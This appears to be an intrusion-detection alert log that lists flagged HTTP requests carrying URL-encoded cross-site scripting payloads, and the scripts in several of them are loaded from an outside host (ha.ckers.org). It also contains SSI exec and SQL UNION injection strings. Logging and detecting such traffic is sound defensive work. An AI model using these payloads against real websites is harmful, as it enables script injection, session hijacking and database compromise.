Packet [744]	Uri [/web/?demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [745]	Uri [/web/?demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [746]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [747]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [748]	Uri [/web/?demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [749]	Uri [/web/?demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [750]	Uri [/web/?demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [751]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [752]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [753]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [754]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [755]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [758]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [783]	Uri [/web/?demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [801]	Uri [/web/?email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [804]	Uri [/web/?email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [805]	Uri [/web/?email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [806]	Uri [/web/?email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [807]	Uri [/web/?email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [808]	Uri [/web/?email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [837]	Uri [/web/?email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [841]	Uri [/web/?email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [873]	Uri [/web/?email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [876]	Uri [/web/?email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [877]	Uri [/web/?email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [878]	Uri [/web/?email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [879]	Uri [/web/?email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [880]	Uri [/web/?email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [881]	Uri [/web/?email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [882]	Uri [/web/?email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [883]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [884]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [885]	Uri [/web/?email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [886]	Uri [/web/?email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [887]	Uri [/web/?email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [890]	Uri [/web/?email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [915]	Uri [/web/?email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [933]	Uri [/web/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [936]	Uri [/web/?name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [937]	Uri [/web/?name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [938]	Uri [/web/?name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [939]	Uri [/web/?name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [940]	Uri [/web/?name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [969]	Uri [/web/?name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [973]	Uri [/web/?name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1005]	Uri [/web/?name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1008]	Uri [/web/?name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1009]	Uri [/web/?name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1010]	Uri [/web/?name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1011]	Uri [/web/?name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1012]	Uri [/web/?name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1013]	Uri [/web/?name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1014]	Uri [/web/?name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1015]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1016]	Uri [/web/?name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1017]	Uri [/web/?name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1018]	Uri [/web/?name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1019]	Uri [/web/?name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1022]	Uri [/web/?name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1047]	Uri [/web/?name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
# N. packets [1062], [184] with alerts, N. Alerts [184]
# Execution time: 0.358134 s
